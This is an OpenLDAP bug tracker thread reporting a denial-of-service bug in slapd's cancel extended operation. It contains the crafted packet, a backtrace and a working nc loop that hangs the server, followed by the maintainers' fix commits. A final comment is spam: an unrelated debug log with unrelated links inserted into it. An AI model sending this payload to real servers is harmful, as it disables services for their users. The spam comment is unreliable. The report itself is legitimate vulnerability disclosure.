https://bugs.openldap.org/show_bug.cgi?id=9428
Issue ID: 9428 Summary: DoS due to infinite packet processing in slapd Product: OpenLDAP Version: unspecified Hardware: All OS: All Status: UNCONFIRMED Severity: normal Priority: --- Component: slapd Assignee: bugs@openldap.org Reporter: phasip@gmail.com Target Milestone: ---
Processing of a packet results in the command handling thread becomming stuck in an infinite loop. After sending 32 of theese slapd doesn't respond to any new queries and consumes 100% cpu
Packet 00000000: 3036 0200 7730 300b 312e 332e 362e 312e 06..w00.1.3.6.1. 00000010: 312e 3881 1030 0130 0030 3030 3030 3030 1.8..0.0.0000000 00000020: 3030 3030 3030 0030 3030 3030 3030 3030 000000.000000000 00000030: 3030 3030 3030 3030 3030 3030 3030 3030 0000000000000000 00000040: 30 0
GDB backtrace (gdb) thread 3 [Switching to thread 3 (Thread 0x7fff8aad2700 (LWP 12))] #0 0x00007ffff7eb489b in sched_yield () at ../sysdeps/unix/syscall-template.S:78 78 ../sysdeps/unix/syscall-template.S: No such file or directory. (gdb) bt #0 0x00007ffff7eb489b in sched_yield () at ../sysdeps/unix/syscall-template.S:78 #1 0x0000555555671671 in ldap_pvt_thread_yield () at thr_posix.c:249 #2 0x00005555555d9255 in cancel_extop (op=0x7fff7c001160, rs=<optimized out>) at cancel.c:143 #3 0x00005555555b449a in fe_extended (op=0x7fff7c001160, rs=0x7fff8aad1a80) at extended.c:225 #4 0x00005555555b41c2 in do_extended (op=0x7fff7c001160, rs=0x7fff8aad1a80) at extended.c:175 #5 0x0000555555583d09 in connection_operation (ctx=ctx@entry=0x7fff8aad1ba0, arg_v=0x7fff7c001160) at connection.c:1163 #6 0x0000555555584370 in connection_read_thread (ctx=0x7fff8aad1ba0, argv=0xc) at connection.c:1314 #7 0x0000555555671080 in ldap_int_thread_pool_wrapper (xpool=0x555555799240) at tpool.c:1051 #8 0x00007ffff7faa609 in start_thread (arg=<optimized out>) at pthread_create.c:477 #9 0x00007ffff7ed1293 in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:95
Testing: docker run --privileged -it --net=host --entrypoint gdb phasip/openldap /openldap/servers/slapd/slapd -ex 'set args -h ldap://:1389/ -d 256' -ex 'run' for i in {1..32}; do echo -en '\x30\x36\x02\x00\x77\x30\x30\x0b\x31\x2e\x33\x2e\x36\x2e\x31\x2e\x31\x2e\x38\x81\x10\x30\x01\x30\x00\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x00\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30' | timeout 1 nc localhost 1389 & done
https://bugs.openldap.org/show_bug.cgi?id=9428
Howard Chu hyc@openldap.org changed:
What |Removed |Added ---------------------------------------------------------------------------- Status|UNCONFIRMED |RESOLVED Resolution|--- |TEST
--- Comment #1 from Howard Chu hyc@openldap.org --- fixed in master
https://bugs.openldap.org/show_bug.cgi?id=9428
Quanah Gibson-Mount quanah@openldap.org changed:
What |Removed |Added ---------------------------------------------------------------------------- Target Milestone|--- |2.4.57
--- Comment #2 from Quanah Gibson-Mount quanah@openldap.org --- trunk:
• dfe1f649 by Howard Chu at 2020-12-20T21:31:15+00:00 ITS#9428 fix cancel exop
https://bugs.openldap.org/show_bug.cgi?id=9428
Quanah Gibson-Mount quanah@openldap.org changed:
What |Removed |Added ---------------------------------------------------------------------------- Resolution|TEST |FIXED
--- Comment #3 from Quanah Gibson-Mount quanah@openldap.org --- RE24:
• 9d0e8485 by Howard Chu at 2020-12-21T16:05:12+00:00 ITS#9428 fix cancel exop
https://bugs.openldap.org/show_bug.cgi?id=9428
Quanah Gibson-Mount quanah@openldap.org changed:
What |Removed |Added ---------------------------------------------------------------------------- Status|RESOLVED |VERIFIED
https://bugs.openldap.org/show_bug.cgi?id=9428
--- Comment #4 from Mehmet gelisin mehmetgelisin@aol.com --- ..] conn=1000 op=1 modifications: replace: employeeNumber one value, length 3 conn=1000 op=1 MOD dn="cn=Anna http://www-look-4.com/ Blume,ou=Users,ou=schulung,dc=stroeder,dc=local" conn=1000 op=1 MOD attr=employeeNumber bdb_dn2entry("cn=anna blume,ou=users,ou=schulung,dc=stroeder,dc=local") => hdb_dn2id("ou=users,ou=schulung,dc=stroeder,dc=local") <= hdb_dn2id: got id=0x6 http://www.compilatori.com/ => hdb_dn2id("cn=anna blume,ou=users,ou=schulung,dc=stroeder,dc=local") <= hdb_dn2id: got id=0xd entry_decode: "" <= entry_decode() http://www.wearelondonmade.com/ ==> unique_modify <cn=Anna Blume,ou=Users,ou=schulung,dc=stroeder,dc=local> ==> unique_search (|(employeeNumber=456)) put_filter: "(|(employeeNumber=456))" put_filter: OR http://www.jopspeech.com/ put_filter_list "(employeeNumber=456)" put_filter: "(employeeNumber=456)" put_filter: simple http://joerg.li/ put_simple_filter: "employeeNumber=456" ber_scanf fmt ({mm}) ber: => hdb_search bdb_dn2entry("ou=schulung,dc=stroeder,dc=local") http://connstr.net/ => access_allowed: search access to "ou=schulung,dc=stroeder,dc=local" "entry" requested <= root access granted => access_allowed: search access granted by manage(=mwrscxd) => access_allowed: search access to "ou=schulung,dc=stroeder,dc=local" "cn" requested <= root access granted http://embermanchester.uk/ => access_allowed: search access granted by manage(=mwrscxd) send_ldap_result: conn=1000 op=1 p=3 send_ldap_result: err=122 matched="" text="" send_ldap_result: conn=1000 op=1 p=3 send_ldap_result: err=1 matched="" text="unique_search failed" send_ldap_response: msgid=2 tag=103 err=1 http://www.slipstone.co.uk/ ber_flush2: 34 bytes to sd 16 conn=1000 op=1 RESULT tag=103 err=1 text=unique_search failed connection_get(16) connection_get(16): got connid=1000 connection_read(16): checking for input on id=1000 ber_get_next http://www.logoarts.co.uk/ ber_get_next: tag 0x30 len 5 contents: op tag 0x42, time 1304069972 ber_get_next ber_get_next on fd 16 failed errno=0 (Success) conn=1000 op=2 do_unbind conn=1000 op=2 UNBIND http://www.acpirateradio.co.uk/ connection_close: conn=1000 sd=16 conn=1000 fd=16 closed ------------------------------- snip -------------------------------
requested <= root access granted https://waytowhatsnext.com/ => access_allowed: search access granted by manage(=mwrscxd) send_ldap_result: conn=1000 op=1 p=3 send_ldap_result: err=122 matched="" text="" send_ldap_result: conn=1000 op=1 p=3 send_ldap_result: err=1 matched="" text="unique_search failed" send_ldap_response: msgid=2 tag=103 err=1 https://www.webb-dev.co.uk/ ber_flush2: 34 bytes to sd 16 conn=1000 op=1 RESULT tag=103 err=1 text=unique_search failed connection_get(16) connection_get(16): got connid=1000 connection_read(16): checking for input on id=1000 ber_get_next ber_get_next: tag 0x30 len 5 contents: op tag 0x42, time 1304069972 ber_get_next http://www.iu-bloomington.com/ ber_get_next on fd 16 failed errno=0 (Success)
-
openldap-its@openldap.org